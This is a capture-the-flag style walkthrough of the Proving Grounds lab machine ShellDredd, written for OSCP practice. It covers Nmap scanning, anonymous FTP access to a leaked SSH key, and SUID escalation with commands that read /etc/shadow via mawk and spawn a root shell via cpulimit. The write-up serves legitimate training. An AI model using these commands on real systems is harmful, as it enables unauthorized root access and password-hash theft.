Introduction
The article details a penetration testing walkthrough for the Offensive Security Proving Grounds machine named ShellDredd, useful for OSCP (Offensive Security Certified Professional) preparation. It covers key stages: information gathering with Nmap, gaining initial access via FTP anonymous login, using an SSH private key for further access, and performing Linux privilege escalation. The guide highlights tools like GTFOBins for exploiting binaries like Mawk and Cpulimit to achieve root access.
Blue Team Cyber Security & SOC Analyst Study Notes
Information Gathering & Enmeration
Nmap Scanning and the open ports
nmap -p- --open -sV -sT -sC 192.168.191.130 -v -oN nmap
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.45.250
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
61000/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
FTP Anonymous Login
FTP Anonymous login can be discovered by trying “anonymous” as the username and password.
ftp 192.168.191.130 21
Connected to 192.168.191.130.
220 (vsFTPd 3.0.3)
Name (192.168.191.130:naveenj): anonymous
331 Please specify the password.
Password:
230 Login successful.
SSH private key can be found after enumerating the directory content:
ftp> ls -lsa
ftp> cd .hannah
-rwxr-xr-x 1 0 0 1823 Oct 12 2024 id_rsa
226 Directory send OK.
ftp> get id_rsa
226 Transfer complete.
1823 bytes received in 00:00 (8.97 KiB/s)
ftp>
First Foothold Using SSH
ssh -i files/id_rsa hannah@192.168.191.130 -p 61000
hannah@ShellDredd:~$
Linux Privilege Escalation
Binary Exploitation
We can check for files and binaries for permissions and especially the SUID bit set.
hannah@ShellDredd:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/mawk #--strange binary
Mawk from the above output stands out.
What is Mawk in Linux
In Linux, mawk is an implementation of the AWK programming language, optimized for efficiency and performance. It is used for text processing, particularly for extracting, manipulating, and reporting on data.
mawk processes lines of text based on user-defined patterns and actions, making it useful for tasks like searching text, performing calculations, and automating repetitive text-based tasks. It is typically faster and smaller than other AWK versions, such as the original AWK or gawk.
Exploiting Mawk Using GTFOBins
From GTFOBins:
If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run
sh -p
, omit the-p
argument on systems like Debian (<= Stretch) that allow the defaultsh
shell to run with SUID privileges.This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path.
We can apply the above practically and get the the hashes for the users root and hannah.
hannah@ShellDredd:~$ mawk '//' "/etc/shadow" | grep -iE 'root|hannah'
Then we can copy the shadow and passwd file
unshadow passwd shadow > hashes
But this will lead to a dead end if you try to crack the hashes using john the ripper of hashcat therfore this was mentioned for informational purposes.
Exploiting Cpulimit using GTFOBins
What is Cpulimit?
cpulimit
is a command-line utility in Linux that allows users to limit the CPU usage of a specific process. It is useful when you want to restrict a process from using too much CPU, ensuring that it does not consume all available resources, which could impact system performance or other processes. Unlike the nice
or renice
commands, which prioritize CPU access for processes, cpulimit
actively throttles the CPU usage of a given process.
Here’s a basic example of how you might use cpulimit
:
sudo cpulimit -p 12345 -l 30
In this example:
-p 12345
specifies the PID of the process to limit.-l 30
limits the process to 30% of the CPU.
Options:
-e <executable>
: Limits CPU usage based on the executable name.-p <pid>
: Limits CPU usage of a process by its PID.-l <percentage>
: Sets the CPU usage limit as a percentage.-b
: Run in the background.-z
: If the process is not running, wait for it to start before limiting CPU usage.
Example:
To limit a process called myprocess
to 20% CPU usage, you can run:
bashCopy codesudo cpulimit -e myprocess -l 20
Limitations:
cpulimit
may not work as effectively on processes that frequently fork or run for a very short duration.- It doesn’t work system-wide and only affects the specified process.
From GTFOBins:
If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run
sh -p
, omit the-p
argument on systems like Debian (<= Stretch) that allow the defaultsh
shell to run with SUID privileges.This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path.
Applying this practically:
./cpulimit -l 100 -f -- /bin/sh -p
# whoami
root
You can also watch: